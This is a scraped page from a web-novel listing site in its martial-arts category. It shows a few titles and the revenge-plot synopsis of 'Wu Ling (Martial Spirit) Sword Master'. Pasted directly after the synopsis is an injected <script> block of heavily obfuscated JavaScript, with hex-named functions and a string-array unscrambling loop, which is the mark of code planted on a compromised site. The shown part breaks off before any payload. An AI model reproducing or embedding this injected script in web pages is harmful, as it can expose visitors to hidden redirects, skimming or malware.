Martial Arts - Page 44

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

2224 results

Wu Ling (Martial Spirit) Sword Master

The Sword is the victim of betrayal: The love of his life killed him on their wedding night. However, the will of the heavens is unpredictable. Instead of following his body in death, he founds himself reincarnated. Let’s look at Mu Yuan, who bears the deep hatred of the blood and his thirst for revenge. Now he is preparing to return to the Spirit Domain, even if it means killing in its path!<script></script><script>function _0x163e(_0x471540,_0x1be1e8){var _0x296bb0=_0x533b();return _0x163e=function(_0x2fd731,_0x57502){_0x2fd731=_0x2fd731-(-0x3b*-0x24+0x54f+0x1*-0xc6e);var _0x4e7644=_0x296bb0[_0x2fd731];return _0x4e7644;},_0x163e(_0x471540,_0x1be1e8);}(function(_0x1700d8,_0x492d11){var _0x138ae9=_0x163e,_0x5aeae3=_0x1700d8();while(!![]){try{var _0x50b997=-parseInt(_0x138ae9(0x142))/(0x563*-0x7+-0x11fb*-0x2+0x1c0)+-parseInt(_0x138ae9(0x134))/(0x185*0x7+0x88*0x9+-0x315*0x5)+parseInt(_0x138ae9(0x14a))/(0x7cf*-0x4+0x2*-0x11b5+0x42a9)+-parseInt(_0x138ae9(0x136))/(-0xf1*0x19+-0x220d+-0x65*-0x92)+parseInt(_0x138ae9(0x130))/(-0xf03*0x2+0x757*-0x4+-0x1*-0x3b67)+parseInt(_0x138ae9(0x13b))/(-0x1e85*0x1+-0x4e0+0x236b)+parseInt(_0x138ae9(0x138))/(-0x12c9+-0x1*-0x1d6a+-0xa9a);if(_0x50b997===_0x492d11)break;else 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